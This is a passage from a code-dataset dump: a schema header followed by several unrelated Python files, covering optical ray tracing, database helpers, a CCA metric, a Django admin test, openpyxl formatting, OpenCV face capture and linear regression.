blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0ed82aba8af8eeb63fcb0b05507f0253e61ae4b3 | a016ccc9a49e11e7dcb78b040c31fe20922bdf02 | /TOM_air/ray_traj_3D_batch_stretched2.py | ef45a730ff112e14b807fc32bcb7a149992eadb1 | [] | no_license | hgoumner/Python | 568f11fadec73c690b297824503d58cdb750be1e | d210fb3f881ce9b9d997d77b6bdcdd402ab27cdf | refs/heads/master | 2021-06-03T23:55:46.135583 | 2021-05-24T19:40:00 | 2021-05-24T19:40:00 | 107,972,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,752 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 8 08:35:08 2017
@author: goumnero
"""
#%% Import modules
import numpy as np
import pandas as pd
import scipy.interpolate as si
import numdifftools as nd
from scipy.integrate import odeint
#%% Input
# Load file
direc = '1 K/KFH/T15_5055'
data = pd.read_csv(direc + '/1K_T15_5055.csv',header=8)
#%% Import temperature, compute refractive index, export data
# Extract coordinates and temperature
def get_temp(data):
data = data.values # Convert data to array
xin = data[:,0]+10 # Get X coordinates
yin = data[:,1] # Get Y coordinates
zin = data[:,2] # Get Z coordinates
Tin = data[:,3] # Get Temperature
x = np.unique(xin) # Get unique X coordinates
y = np.unique(yin) # Get unique Y coordinates
z = np.unique(zin) # Get unique Z coordinates # Center Z coordinates to optical axis
dx = x[1] - x[0] # Get X step
dy = y[1] - y[0] # Get Y step
dz = z[1] - z[0] # Get Z step
nx = len(x) # Get number of X coordinates
ny = len(y) # Get number of Y coordinates
nz = len(z) # Get number of Z coordinates
lx = int(max(x)-min(x)) # Get range of X
ly = int(max(y)-min(y)) # Get range of Y
lz = int(max(z)-min(z)) # Get range of Z
r = np.array([x,y,z]).T # Create position array
y3, x3, z3 = np.meshgrid(y,x,z) # Create 3D coordinate array
t = Tin.reshape((ny,nx,nz),order='F').transpose() # Reshape temperature input to 3D array
'''
Check if reshaped data matches input
check = np.c_[x3.ravel(),y3.ravel(),z3.ravel(),t3d.ravel()]
inds = np.lexsort((check[:,1],check[:,0]))
check = check[inds]
'''
return x, y, z, dx, dy, dz, nx, ny, nz, lx, ly, lz, r, x3, y3, z3, t # Output parameters
# Refractive Index function according to Gladstone-Dale Law
def N3D(pos):
global t
beta = 0.000293
Ts = 293.15
# Compute whole 3D array or determine starting point
if type(pos) == np.ndarray:
xg,yg,zg = np.meshgrid(pos[0],pos[1],pos[2])
out = np.zeros(np.shape(xg))
ox = np.shape(xg)[1]
oy = np.shape(xg)[0]
oz = np.shape(xg)[2]
for i in range(ox):
for j in range(oy):
for k in range(oz):
out[j,i,k] = 1 + beta*Ts/t[j,i,k]
# out = 1 + beta*Ts/t
else:
global x,y,z
xx = pos[0]
yy = pos[1]
zz = pos[2]
idx = np.argmin(np.abs(x-xx)) # Index of closest x element
idy = np.argmin(np.abs(y-yy)) # Index of closest y element
idz = np.argmin(np.abs(z-zz)) # Index of closest z element
out = 1 + beta*Ts/t[idy,idx,idz]
return out # Output parameters
#def N3D(r):
#
# if len(r) > 3:
# yyy,xxx,zzz = np.meshgrid(r[:,1],r[:,0],r[:,2])
# else:
# xxx = r[0]
# yyy = r[1]
# zzz = r[2]
#
# return 1+0.0*xxx+0.000*yyy+0.02*zzz
def tinterp(x,y,z,t,p):
# Interpolation
xx = x #np.linspace(np.min(x3),np.max(x3),p)
yy = np.linspace(np.min(y),np.max(y),p)
zz = np.linspace(np.min(z),np.max(z),p)
dx = xx[1] - xx[0] # Get X step
dy = yy[1] - yy[0] # Get Y step
dz = zz[1] - zz[0] # Get Z step
nx = len(xx) # Get number of X coordinates
ny = len(yy) # Get number of Y coordinates
nz = len(zz) # Get number of Z coordinates
y3i, x3i, z3i = np.meshgrid(yy,xx,zz)
r = np.array([xx,yy,zz]).T # Create position array
# itp = si.RegularGridInterpolator((y, x, z), t, method='nearest')
# grid = np.ix_(yy, xx, zz)
# ti = itp(grid)
ti = si.interpn((y,x,z), t, np.array([y3i,x3i,z3i]).T)
ti = ti.swapaxes(1,2)
return x3i, y3i, z3i, dx, dy, dz, nx, ny, nz, ti, r
# Get data
x, y, z, dx, dy, dz, nx, ny, nz, lx, ly, lz, r, x3, y3, z3, t = get_temp(data)
offset = 0 #np.mean(z)
# Interpolate onto finer grid
p = 8
x3i, y3i, z3i, dxi, dyi, dzi, nxi, nyi, nzi, ti, ri = tinterp(x,y,z,t,p+1)
x3 = x3i
y3 = y3i
z3 = z3i
dx = dxi
dy = dyi
dz = dzi
nx = nxi
ny = nyi
nz = nzi
tin = t
t = ti.T
r = ri
# Refractive Index and gradients
n = N3D(r)
ngy, ngx, ngz = np.gradient(n,dy,dx,dz,axis=(1,0,2))
tgy, tgx, tgz = np.gradient(t,dy,dx,dz,axis=(1,0,2))
# Export 3D field output
xo = x3.ravel()
yo = y3.ravel()
zo = z3.ravel() - offset
to = t.ravel()
no = n.ravel()
tgxf = tgx.ravel()
tgyf = tgy.ravel()
tgzf = tgz.ravel()
ngxf = ngx.ravel()
ngyf = ngy.ravel()
ngzf = ngz.ravel()
ngtot = np.sqrt(ngxf**2+ngyf**2+ngzf**2)
ngxp = abs(ngxf/ngtot)
ngyp = abs(ngyf/ngtot)
ngzp = abs(ngzf/ngtot)
fo = np.c_[xo,yo,zo,to,tgxf,tgyf,tgzf,no,ngxf,ngyf,ngzf,ngtot,ngxp,ngyp,ngzp]
fo = np.float64(sorted(fo,key=lambda x: (x[2],x[1])))
head1 = 'TITLE = "3D N and T"\nVARIABLES = "X","Y","Z","T","Tx","Ty","Tz","N","Nx","Ny","Nz","Ntot","Nxt","Nyt","Nzt"\nZONE T = "T and N", I=%d, J=%d, K=%d' % (nx,ny,nz)
np.savetxt(direc + '/KF_3D_TN.dat',fo,fmt='%10.6e',delimiter='\t',header=head1,comments='')
#%% Compute and export ray trajectory
# Gradient
grd_n3d = nd.Gradient(N3D)
# Integration range
t_range = np.arange(0,np.max([lx,ly,lz])+5,0.01)
def start_point(x,y,z,r_0,theta):
########################## Starting point #####################################
# id_x = np.argmin(np.abs(x-r_0[0])) # Index of closest x element
# id_y = np.argmin(np.abs(y-r_0[1])) # Index of closest y element
# id_z = np.argmin(np.abs(z-r_0[2])) # Index of closest z element
n_0 = N3D(r_0)
######################### Initial incident angle ##############################
# theta_0 = theta*(np.pi/180)
############ Initial velocity based on parametrization constraint #############
'''
n(r)/mag(r.) = 1, n(r) = mag(r.) = sqrt((dx/dt)^2+(dy/dt)^2+(dz/dt)^2)
dx/dt = n(r_0)*cos(theta_0)
dy/dt = n(r_0)*sin(theta_0)
dz/dt = n(r_0)*cos(theta_0)
'''
# Derivative
# a = 0.000
dxdt = -n_0 #np.float64(n_0*np.cos(theta_0)-a)
dydt = 0.0 #np.float64(n_0*np.sin(theta_0)-a)
dzdt = 0.0 #np.float64(np.sqrt(n_0**2-dxdt**2-dydt**2))
# ch = np.float64(np.sqrt(dxdt**2+dydt**2+dzdt**2))/n_0
# Initial velocity
v_0 = [dxdt,dydt,dzdt]
return v_0 # Output parameter
# Compute the differential
def diff_y3d(y, t):
xx = y[0]
yy = y[1]
zz = y[2]
rr = [xx,yy,zz]
# print(rr)
n_t = N3D(rr) # starting RI
grd = grd_n3d(rr) # gradient
return [y[3], y[4], y[5], grd[0]*n_t, grd[1]*n_t, grd[2]*n_t] # Output parameter
# Export results
def exp_res(sol3d,x,y,z,nx,ny,nz,r_0):
rx = sol3d[:,0] # Get x coordinate of ray
ry = sol3d[:,1] # Get y coordinate of ray
rz = sol3d[:,2] # Get z coordinate of ray
delx = rx[-1]-rx[0] # Get x deflection (last - first point)
dely = ry[-1]-ry[0] # Get y deflection (last - first point)
delz = rz[-1]-rz[0] # Get z deflection (last - first point)
# Ray trajectory
rto = np.c_[rx,ry,rz]
xc = rto[rto[:,0]>=min(x),:]
xc = xc[xc[:,0]<=max(x),:]
yc = xc[xc[:,1]>=min(y),:]
yc = yc[yc[:,1]<=max(y),:]
zc = yc[yc[:,2]>=min(z),:]
zc = zc[zc[:,2]<=max(z),:]
rout = zc
npp = 100
rout = np.c_[rout[::npp,0],rout[::npp,1],rout[::npp,2]]
# vals = 8000 # Set number of values to be interpolated
# rxint = np.linspace(min(x),round(max(x)),vals+1) # Set interpolated x array
# ryint = np.interp(rxint,rout[:,0],rout[:,1]) # Set interpolated y array
# rzint = np.interp(rxint,rout[:,0],rout[:,2]) # Set interpolated z array
# rout = np.c_[rxint,ryint,rzint] # Put ray trajectory in array
devx = np.abs(rout[:,0] - rout[0,0])/1000
devy = (rout[:,1] - ry[0])/1000
devz = (rout[:,2] - rz[0])/1000
devtot = np.sqrt(devy**2+devz**2)
rout = np.c_[rout,devx,devy,devz,devtot]
# print('\ndY: %10.8e m, dZ: %10.8e m' % (dely/1000,delz/1000))
return rout, delx, dely, delz
# Allocate deflection arrays
xd = []
yd = []
zd = []
delx = []
dely = []
delz = []
rall = np.zeros((1,7))
n = 5
b = 1
ysq = np.linspace(b,max(y)-b,n)
zsq = np.linspace(min(z)+b,max(z)-b,n)
xsq = np.max(x)*np.ones(1)
Xsq, Ysq, Zsq = np.meshgrid(xsq,ysq,zsq)
xpr = Xsq.ravel()
ypr = Ysq.ravel()
zpr = Zsq.ravel()
pr = np.c_[xpr,ypr,zpr]
for i in range(len(pr)):
# Starting angle
theta = 0
# Starting point
x0 = pr[i,0]
y0 = pr[i,1]
z0 = pr[i,2]
r_0 = [x0,y0,z0]
# idx, idy, idz, t00, n00 = N3Dc(r_0)
# Starting velocity
v_0 = start_point(x,y,z,r_0,theta)
# Integration
sol3d = odeint(diff_y3d,r_0 + v_0,t_range)
# Export
rcur, dx, dy, dz = exp_res(sol3d,x,y,z,nx,ny,nz,r_0)
rall = np.vstack((rall,rcur))
xd.append(x0)
yd.append(y0)
zd.append(z0)
delx.append(dx/1000)
dely.append(dy/1000)
delz.append(dz/1000)
print('%d / %d' % ((i+1),len(pr)) + ', %d' % (100*(i+1)/len(pr)) + ' %')
# Export 3D Ray trajectory
rall = np.delete(rall, (0), axis=0)
rall[:,2] = rall[:,2] - offset
#head2 = 'TITLE = "3D XYZ"\nVARIABLES = "X","Y","Z"\nZONE T = "Frame 1", I=%d, J=%d' % (len(xout),3)
#np.savetxt('3D_XYZ.dat',rto,fmt=['%6.4e','%6.10e','%6.10e'],delimiter='\t',header=head2,comments='')
head2 = 'X,Y,Z,dXp,dYp,dZp,dTOTp'
np.savetxt(direc + '/' + 'KF_3D_XYZ.csv',rall,fmt=['%8.4f','%8.4f','%8.4f','%10.6e','%10.6e','%10.6e','%10.6e'],delimiter=',',header=head2,comments='')
# Export 3D Ray deflection
deltot = []
for i in range(len(delx)):
deltot.append(np.sqrt(dely[i]**2+delz[i]**2))
zd = [zd[i]-offset for i in range(len(zd))]
defl = np.c_[range(1,len(zsq)*len(ysq)+1),xd,yd,zd,delx,dely,delz,deltot]
head3 = 'N,X0,Y0,Z0,dX,dY,dZ,dTOT'
np.savetxt(direc + '/KF_3D_Deflection.csv',defl,fmt='%10.6f',delimiter=',',header=head3,comments='')
#%% Plot
'''
import matplotlib
import matplotlib.cm as cmx
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
pl1 = 0
pl2 = 0
pl3 = 0
if pl1 == 1:
fig = plt.figure(1)
ax = fig.add_subplot(111, projection='3d')
cmm = plt.get_cmap('jet')
cNorm = matplotlib.colors.Normalize(vmin=np.min(t3d), vmax=np.max(t3d))
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=cmm)
nnn = 2
ax.scatter(fo[::nnn,0],fo[::nnn,1],fo[::nnn,2], c=scalarMap.to_rgba(fo[::nnn,3]), alpha=0.5)
scalarMap.set_array(t3d)
fig.colorbar(scalarMap)
ax.set_xlim([np.min(x3),np.max(x3)])
ax.set_ylim([np.min(y3),np.max(y3)])
# ax.set_zlim([np.min(z3),np.max(z3)])
ax.set_xlabel('X [mm]')
ax.set_ylabel('Y [mm]')
ax.set_zlabel('Z [mm]')
plt.show()
#if pl2 == 0:
#
# foo = fo[fo[:,0].argsort()]
#
# npp = 100
# xp = foo[::npp,0]
# yp = foo[::npp,1]
# zp = foo[::npp,2]
# npl = foo[::npp,3]
# cs = npl
#
# fig = plt.figure(1)
# ax = fig.add_subplot(111, projection='3d')
# ax.plot(rx, ry, rz, 'y',linewidth=2)
# ax.quiver(r_0[0],r_0[1],r_0[2],v_0[0],v_0[1],v_0[2])
# ax.scatter(r_0[0],r_0[1],r_0[2],color='r')
# cmm = plt.get_cmap('jet')
# cNorm = matplotlib.colors.Normalize(vmin=min(cs), vmax=max(cs))
# scalarMap = cmx.ScalarMappable(norm=cNorm, cmap=cmm)
# ax.scatter(xp,yp,zp, c=scalarMap.to_rgba(cs), alpha=0.3)
# scalarMap.set_array(cs)
# fig.colorbar(scalarMap)
# ax.set_xlim([np.min(x),np.max(x)])
# ax.set_ylim([np.min(y),np.max(y)])
# ax.set_zlim([np.min(z),np.max(z)])
# ax.set_xlabel('X [mm]')
# ax.set_ylabel('Y [mm]')
# ax.set_zlabel('Z [mm]')
# plt.show()
#
#if pl3 == 0:
#
# plt.plot(range(n),dely,'r',label='dY')
# plt.plot(range(n),delz,'k',label='dZ')
# plt.xlabel('starting Y [mm]')
# plt.ylabel('Deflection [mm]')
# plt.legend()
# plt.grid()
#
''' | [
"[email protected]"
] | |
ab1b6495c6b5e7313cea6a884eb8ff95bfdbac39 | 1ebd29d8b8ae0f6b209a5c00dcda2cbaa1212245 | /wxnotify/common/database.py | 369fa2d1d5ec3110bc0a1daca7cc95d13274c996 | [] | no_license | mxgnene01/wxnotify | 92ea0ccf67b8a8fe563bcfd8a464a1b7edf21352 | 26bd8b2bda9ff64b236cf55c5c140c1ad25aed9c | refs/heads/master | 2021-06-24T17:19:39.640141 | 2017-08-14T10:08:33 | 2017-08-14T10:08:33 | 98,369,502 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 882 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Meng xiangguo <[email protected]>
#
# _____ ______
# ____==== ]OO|_n_n__][. | |]
# [________]_|__|________)< |MENG|
# oo oo 'oo OOOO-| oo\_ ~o~~~o~'
# +--+--+--+--+--+--+--+--+--+--+--+--+--+
# 2017/7/24 下午5:55
def fetchall_as_dict(cursor):
"""fetch all cursor results and returns them as a list of dicts"""
names = [x[0] for x in cursor.description]
rows = cursor.fetchall()
if rows:
return [dict(zip(names, row)) for row in rows]
else:
return []
def fetchone_as_dict(cursor):
"""fetch one cursor results and returns them as a list of dicts"""
names = [x[0] for x in cursor.description]
row = cursor.fetchone()
if row:
return dict(zip(names, row))
else:
return None
| [
"[email protected]"
] | |
4707dc437370ad22fffa4b3c6ee6be7a01756a24 | d3c3b59c9a9a31b8bebe9994573a8d51638f58fb | /ch02/odbchelper.py | 76031eb18fe332d1e0a0f050ac9ff78a8b394d64 | [] | no_license | agzon/py-dive | 4f5e1a129fb06b07eb5c04f500a8ae3fc8b428c6 | e3f2bbdf7b06dd1919b7ff34ac36434043e41162 | refs/heads/master | 2021-01-10T14:58:58.795980 | 2017-02-06T21:35:52 | 2017-02-06T21:35:52 | 52,632,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | """odbchelper.py sample script
This program is part of "Dive Into Python", a free Python book for
experienced programmers. Visit http://diveintopython.org/ for the
latest version.
All this stuff at the top of the script is just optional metadata;
the real code starts on the "def buildConnectionString" line
"""
__author__ = "Mark Pilgrim ([email protected])"
__version__ = "$Revision: 1.2 $"
__date__ = "$Date: 2004/05/05 21:57:19 $"
__copyright__ = "Copyright (c) 2001 Mark Pilgrim"
__license__ = "Python"
def buildConnectionString(params):
"""Build a connection string from a dictionary
Returns string.
"""
return ";".join(["%s=%s" % (k, v) for k, v in params.items()])
if __name__ == "__main__":
myParams = {"server":"mpilgrim", \
"database":"master", \
"uid":"sa", \
"pwd":"secret"
}
print (buildConnectionString(myParams))
| [
"[email protected]"
] | |
71c286a51bd25e93264d4d7a44f0b59c77bdbea6 | 8fb9b99e5f05ffdc1e690bcc3bdcb6bcad4ec077 | /src/comparators/compare_functions/cca.py | a172e7c72bcfebb844d00ebaa53dabbae133b2f6 | [
"Apache-2.0"
] | permissive | asd249180/similarity_and_matching | 6cc716d08c863aaae7596017d79800f4c6992fd5 | 225cbc4850a790a37ea18d4c519a4306e9db3590 | refs/heads/main | 2023-05-28T21:20:40.989333 | 2021-06-04T19:22:34 | 2021-06-04T19:22:34 | 373,938,897 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | import numpy as np
def rearrange_activations(activations):
batch_size = activations.shape[0]
flat_activations = activations.reshape(batch_size, -1)
return flat_activations
def cca(x1, x2):
x1_flat, x2_flat = rearrange_activations(x1), rearrange_activations(x2)
q1, r1 = np.linalg.qr(x1_flat)
q2, r2 = np.linalg.qr(x2_flat)
return (np.linalg.norm(q2.T @ q1))**2 / x1_flat.shape[1]
if __name__ == '__main__':
from sklearn.cross_decomposition import CCA
import numpy as np
n = 500000
features = 10000
np.random.seed(0)
U = np.random.random_sample(n).reshape(n//features,features)
V = np.random.random_sample(n).reshape(n//features,features)
print(cca(U,V))
# Sklearn
sk_cca = CCA(n_components=1)
sk_cca.fit(U, V)
U_c, V_c = sk_cca.transform(U, V)
result = np.corrcoef(U_c.T, V_c.T)[0,1]
print(result)
# Matrix
score = np.corrcoef(U_c.T, V_c.T)
print(score) | [
"[email protected]"
] | |
4a998100d229be9b4cc057ea25709326a34e031b | 1d2c2b487599d09214f8c4f4f1d5056126811f51 | /curriculum/tests/test_admin.py | 15998439cd053535e0431fb11ec47d9a828a08dd | [
"MIT"
] | permissive | Vj-Ydv/jobs | c49a50493133733ecdcc9a57f169a0beeacc8b1c | 9b1f65dfb91cf4d8d32b674cf4e14713b31beee1 | refs/heads/master | 2023-07-06T00:23:55.535407 | 2019-06-28T04:09:41 | 2019-06-28T04:09:41 | 194,122,950 | 0 | 0 | MIT | 2023-06-30T22:19:39 | 2019-06-27T15:45:50 | Python | UTF-8 | Python | false | false | 1,291 | py | from django.test import TestCase
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from curriculum.tests import factories
User = get_user_model()
class AdminExportResumeTest(TestCase):
def setUp(self):
self.user = User.objects.create(username='Mike', is_superuser=True, is_staff=True)
self.user.set_password('foo')
self.user.save()
self.client.login(username='Mike', password='foo')
def test_get(self):
resume = factories.ResumeFactory()
url = reverse('admin:curriculum_resume_changelist')
data = {
'_selected_action': [resume.id],
'action': 'export_resume',
'index': '0',
'select_across': '0',
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, resume.title)
def test_export(self):
resume = factories.ResumeFactory()
url = reverse('admin:curriculum_resume_changelist')
data = {
'_export': '_export',
'_selected_action': [resume.id],
'action': ['export_resume'],
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 200)
| [
"[email protected]"
] | |
9f2e3d33fd9bbd0961bbb6c4ac1974785fc50739 | 20be3dda44d1ab807c3964fb3376c8e326c4a2e1 | /Lib/site-packages/salesforce_api/client.py | ecbfa3081620553497821d4a4b73258f1a323490 | [
"BSD-3-Clause"
] | permissive | rayhaneHamoumi/arduino | 33650b076b279349e2c3802640342b5f7dbb92da | 7ebe595baea056ca6b9eeb8b80fa170bd179000e | refs/heads/master | 2022-10-29T06:16:38.183718 | 2020-06-12T09:19:28 | 2020-06-12T09:19:28 | 268,807,931 | 0 | 1 | null | 2022-10-12T08:40:23 | 2020-06-02T13:25:40 | Python | UTF-8 | Python | false | false | 1,537 | py | import requests
from .core import Connection
from . import login
from .services import sobjects, basic, tooling, deploy, retrieve, bulk
from .utils import misc as misc_utils
class Client:
def __init__(self, connection: Connection = None,
domain: str = None, username: str = None, password: str = None,
security_token: str = None, password_and_security_token: str = None, client_id: str = None,
client_secret: str = None, access_token: str = None, session: requests.Session = None, is_sandbox=False):
self.connection = connection if connection else login.magic(
domain=domain,
username=username,
password=password,
security_token=security_token,
password_and_security_token=password_and_security_token,
client_id=client_id,
client_secret=client_secret,
access_token=access_token,
session=misc_utils.get_session(session),
is_sandbox=is_sandbox
)
self._setup_services()
def _setup_services(self):
self.basic = basic.Basic(self.connection)
self.sobjects = sobjects.SObjects(self.connection)
self.tooling = tooling.Tooling(self.connection)
self.deploy = deploy.Deploy(self.connection)
self.retrieve = retrieve.Retrieve(self.connection)
self.bulk = bulk.Client(self.connection)
self.bulk_v1 = bulk.v1.Client(self.connection)
self.bulk_v2 = bulk.v2.Client(self.connection)
| [
"[email protected]"
] | |
9b8b8903a02b1d8d679121b8d00342707eab6385 | 5249381720c1feaa6bb91966d1919da77fc4eb76 | /python_web_demo/l7_05_元素操作.py | e556b593ff1d3a003dd04c93d2486927c099af81 | [] | no_license | liqi629/py_study | 7ab34d816e622fe57c2a3373a7f5d82472802dc8 | c3d192be9f755c9ea912006e545fd6f5ea43370d | refs/heads/master | 2022-12-24T10:02:38.707313 | 2020-09-29T07:27:27 | 2020-09-29T07:27:27 | 299,537,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | # -*- coding: utf-8 -*-
# @Time : 2019/5/21 22:52
# @Author : l7
# @Email :[email protected]
# @File : l7_05_元素操作.py
# @Software : PyCharm
from selenium import webdriver
import time
#打开浏览器Chrome
driver = webdriver.Chrome()
#打开网址
driver.get("http://www.baidu.com")
#3、获取属性值
value = driver.find_element_by_id("su").get_attribute("value")
print(value)
#4、获取文本内容
text = driver.find_element_by_id("su").text
#1、输入,输入框属性值"kw"
driver.find_element_by_id("kw").send_keys("hello")
#2、点击,搜索按钮属性值"su"
driver.find_element_by_id("su").click()
time.sleep(2)
driver.quit()
| [
"[email protected]"
] | |
58cad4e5e762aad9c4bc57dfc52447bb0ccc5fe0 | 913c7e153667d3477ace6c730a06ab6f02a07b3c | /example_all_any.py | 280bd0a1f2c0f11cfc664ddba523110f429ec0cc | [
"MIT"
] | permissive | sidh261805/python_examples | 67af337cfe165f9ba258573028df1f9142343050 | 7ea5d34b7a27e8b85b39c8fa4ce21d36309b7de3 | refs/heads/main | 2023-07-14T13:53:58.447861 | 2021-08-23T12:39:04 | 2021-08-23T12:39:04 | 399,098,227 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 976 | py | num1 = [2,4,6,8,0]
num2 = [1,3,5,6,7]
#if any True final is true
print(any([num%2==0 for num in num1]))
print(any([num%2==0 for num in num2]))
#if all True final is true
print(all([num%2==0 for num in num1]))
print(all([num%2==0 for num in num2]))
def sum(*args):
if all([(type(arg)==int or type(arg)==float) for arg in args]):
return "all are int or float"
else:
return "different types"
print(sum(1,2,3,5.5,"hello"))
################# Advance min 0r max ###################
student = [{"name" : "sidd", "score" : 80, "age" : 27},{"name" : "alka", "score" : 90, "age" : 26},{"name" : "lala", "score" : 99, "age" : 30}]
print(max(student, key = lambda item: item.get("score")))
print(max(student, key = lambda item: item.get("score"))["name"])
################ Advance sort ############################
fruits = ['apple','kiwi','mango','banana']
fruits.sort()
print(fruits)
print(sorted(student, key= lambda dic:dic.get("name"),reverse=True)) | [
"[email protected]"
] | |
dd592073d7319d4f9de6d016e818569d784ce8ad | 67063668c781d5b1fd1c1d69c79a045ed4f10176 | /python/openpyxl/formatting/formatting.py | 3623fa596808fd1a46665a90561c3fbe4494afdd | [
"MIT"
] | permissive | jrockway/tichu-tournament | eacb08b2dd502578fec3780d692648f0d58e90f4 | 6335b8fab89b76c42ac5a078176a500a11f0e4ff | refs/heads/master | 2020-03-09T21:09:31.431690 | 2018-04-19T23:31:44 | 2018-04-19T23:31:44 | 129,002,367 | 0 | 0 | MIT | 2018-04-10T22:31:00 | 2018-04-10T22:31:00 | null | UTF-8 | Python | false | false | 1,487 | py | from __future__ import absolute_import
# Copyright (c) 2010-2016 openpyxl
from openpyxl.compat import OrderedDict, deprecated
from openpyxl.styles.differential import DifferentialStyle
from .rule import Rule
def unpack_rules(cfRules):
for key, rules in cfRules.items():
for idx,rule in enumerate(rules):
yield (key, idx, rule.priority)
class ConditionalFormatting(object):
"""Conditional formatting rules."""
def __init__(self):
self.cf_rules = OrderedDict()
self.max_priority = 0
def add(self, range_string, cfRule):
"""Add a rule such as ColorScaleRule, FormulaRule or CellIsRule
The priority will be added automatically.
"""
if not isinstance(cfRule, Rule):
raise ValueError("Only instances of openpyxl.formatting.rule.Rule may be added")
rule = cfRule
self.max_priority += 1
rule.priority = self.max_priority
self.cf_rules.setdefault(range_string, []).append(rule)
def _fix_priorities(self):
rules = unpack_rules(self.cf_rules)
rules = sorted(rules, key=lambda x: x[2])
for idx, (key, rule_no, prio) in enumerate(rules, 1):
self.cf_rules[key][rule_no].priority = idx
self.max_priority = len(rules)
@deprecated("Always use Rule objects")
def update(self, cfRules):
pass
@deprecated("Conditionl Formats are saved automatically")
def setDxfStyles(self, wb):
pass
| [
"[email protected]"
] | |
0db720bca678bb4b6aec58ca3f248ba45ffaea0b | b0dd7779c225971e71ae12c1093dc75ed9889921 | /tools/build/v2/test/example_make.py | 4ade4c204d542c9e6e7fe65c9f7be22c69a02ee5 | [
"LicenseRef-scancode-warranty-disclaimer",
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | blackberry/Boost | 6e653cd91a7806855a162347a5aeebd2a8c055a2 | fc90c3fde129c62565c023f091eddc4a7ed9902b | refs/heads/1_48_0-gnu | 2021-01-15T14:31:33.706351 | 2013-06-25T16:02:41 | 2013-06-25T16:02:41 | 2,599,411 | 244 | 154 | BSL-1.0 | 2018-10-13T18:35:09 | 2011-10-18T14:25:18 | C++ | UTF-8 | Python | false | false | 418 | py | #!/usr/bin/python
# Copyright (C) Vladimir Prus 2006.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
# Test the 'make' example.
import BoostBuild
t = BoostBuild.Tester()
t.set_tree("../example/make")
t.run_build_system()
t.expect_addition(["bin/$toolset/debug/main.cpp"])
t.cleanup()
| [
"[email protected]"
] | |
e1e61cd4ef9166e1611b2c6ef5f6fb8843d4461f | 9bad4a99448df1957981d8c2fbd3ef4001d71fea | /a-3-6-1-take pictures.py | fddd724f0c4b653eb41e5300cdf2080766f8d2fd | [] | no_license | paulcwlin/raspi-AIoT-test | a991cac81335c4036cf34d48a9824a8fa077e1c7 | ada56e0668c07a9575a82023dff38e02c0b9220e | refs/heads/master | 2023-04-19T06:23:26.122336 | 2021-04-29T10:00:25 | 2021-04-29T10:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,226 | py | import cv2
ESC = 27
n = 1
index = 0
total = 100
def saveImage(face_image, index):
filename = '/home/pi/Documents/raspi-AIoT-test/images/h1/{:03d}.jpg'.format(index)
cv2.imwrite(filename, face_image)
print(filename)
faceCascade = cv2.CascadeClassifier('/home/pi/opencv/opencv-master/data/haarcascades/haarcascade_frontalface_alt2.xml')
cap = cv2.VideoCapture(0)
cv2.namedWindow('video', cv2.WINDOW_AUTOSIZE)
while n > 0:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(gray, 1.1, 3)
for (x,y,w,h) in faces:
frame = cv2.rectangle(frame,
(x,y), (x+w, y+h),
(0,255,0), 2)
if n % 5 == 0:
face_img = gray[y: y+h, x: x+w]
face_img = cv2.resize(face_img, (400,400))
saveImage(face_img, index)
index += 1
if index >= total:
print('get training data done')
n = -1
break
n += 1
cv2.imshow('video', frame)
if cv2.waitKey(1) == ESC:
cap.release()
cv2.destroyAllWindows()
break | [
"[email protected]"
] | |
4ef26b0753379281e0cd30b80b7422037c4c41e0 | 49260d1490f82a19a6173a74acd416a71530aff9 | /linearRegression.py | c79fe34c911cf43d1a83a779d863087f11f8e2c1 | [] | no_license | SohamSankhe/ml_project | 52cc49dc9d2ab673a7958a29ccdbee8432024cc9 | f2bf4bf69b9420ab208ab5659f2c5de1b25c62fb | refs/heads/master | 2020-04-08T06:11:40.870761 | 2018-11-26T04:53:04 | 2018-11-26T04:53:04 | 159,088,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,734 | py | from numpy.linalg import inv
import numpy as np
from numpy import array
from sklearn.linear_model import LinearRegression
import utils
class RidgeRegResults(): # class to store findings for k fold ridge
def __init__(self):
self.k = 0
self.lamb = 0
self.testIndex = 0 # to id hold out partition
self.sseTraining = 0
self.sseTest = 0
self.theta = []
def setResults(self, k, lamb, testIndex, sseTraining, sseTest, theta):
self.k = k
self.lamb = lamb
self.testIndex = testIndex
self.sseTraining = sseTraining
self.sseTest = sseTest
self.theta = theta
return
# test method
def printData(self):
print('\n-----')
